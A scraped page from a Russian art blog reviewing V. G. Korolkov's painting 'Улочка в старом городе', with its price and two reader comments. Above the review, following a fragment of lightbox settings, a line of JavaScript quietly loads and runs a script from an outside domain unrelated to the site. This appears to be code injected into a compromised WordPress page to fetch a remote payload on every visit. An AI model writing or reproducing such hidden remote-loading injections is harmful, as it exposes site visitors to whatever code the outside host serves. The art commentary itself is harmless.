, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Корольков В. Г. «Улочка в старом городе»

Автор: Юлия | 27 Фев 2011

По мере того, как растут и множатся города, все больше места в творчестве художников завоевывает городской пейзаж. В этом жанре выполнена очередная картина Вячеслава Георгиевича Королькова "Улочка в старом городе", которую я представляю Вашему вниманию.

Уже в названии художник предлагает нам задуматься о феномене "старого города". Чем же он так притягателен, интересен? В чем его преимущество перед "новым городом"? Давайте попробуем разобраться!

Невозможно остановить бег времени для человека, его эмоций и переживаний. А вот вещи и предметы допускают большую свободу для сохранения в неизменном состоянии. Поэтому в современных городах новые высокотехнологичные строения соседствуют как со старинными домами, так и с утратившими былой блеск зданиями прошлого века. Город пестр и многолик, в нем вполне мирно уживаются разные пласты времени. Но в этом и заключается его удивительная особенность, которая  не может не нравится.

Становясь старше, мы пополняем свой багаж воспоминаний и все чаще совершаем путешествия в прошлое. Картина "Улочка в старом городе" – это одна из таких приятных и милых сердцу прогулок. И даже преобладание приглушенных, розово-коричневых оттенков словно указывает нам, что городской пейзаж на картине – лишь плод воображения, не существующий в реальности.

Фигура человека изображена в конце улицы, ведь он не намерен долго задерживаться в плену воспоминаний. Закончится краткий миг ностальгии - и тихая улочка в старом городе вновь уступит место оживленной суете повседневности. Что там, за поворотом? Мы никогда не узнаем заранее, но будем уверенно идти вперед, пока живем.

Картина "Улочка в старом городе" 50×60 см, масло, холст, 2008 г.   Цена 10 000 руб.

Темы: Галерея картин художников, Интернет - Магазин, Критика | Отзывов: 2 »

Отзывов: 2 на “Корольков В. Г. «Улочка в старом городе»”

  1. Evgy22 пишет:
    14 Апр 2011 в 20:51

    Хороший сайт,а улочка Королькова В.Г.хорошо смотриться,постараюсь заработать в инете и купить.
    Евгений

  2. Юлия пишет:
    15 Апр 2011 в 13:40

    Желаю Вам удачи, Евгений! :)

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress